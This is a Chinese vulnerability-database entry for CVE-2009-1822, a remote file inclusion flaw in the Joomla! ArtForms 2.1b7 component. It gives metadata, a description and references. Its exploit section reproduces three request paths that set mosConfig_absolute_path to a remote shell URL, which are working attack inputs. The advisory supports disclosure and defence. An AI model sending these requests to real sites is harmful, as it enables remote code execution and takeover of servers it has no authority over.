Joomla! InterJoomla ArtForms组件远程文件代码注入漏洞漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117784 漏洞类型 代码注入
发布时间 2009-05-15 更新时间 2009-06-01
CVE编号 CVE-2009-1822 CNNVD-ID CNNVD-200905-341
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8697
https://cxsecurity.com/issue/WLB-2009060081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-341
|漏洞详情
Joomla!InterJoomlaArtForms(com_artforms)component2.1b7版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1)imgcaptcha.php或(2)对assets/captcha/includes/captchaform/的mp3captcha.php,或(3)assets/captcha/includes/captchatalk/swfmovie.php的mosConfig_absolute_path参数中的一个URL,执行任意PHP代码。
|漏洞EXP
ArtForms 2.1b7 remote file includes
 
From Turkey
iskorpitx (O bir dünya markası Asla Taklit Edilemez)
 
// swfmovie.php - swf output and config
 
/* output captcha image */
 
/* output captcha mp3 */
 
----------------------------------------------------------------------------------
 
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell

[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx
admin@mavi1.org

# milw0rm.com [2009-05-15]
|参考资料

来源:BID
名称:34986
链接:http://www.securityfocus.com/bid/34986
来源:MILW0RM
名称:8697
链接:http://www.milw0rm.com/exploits/8697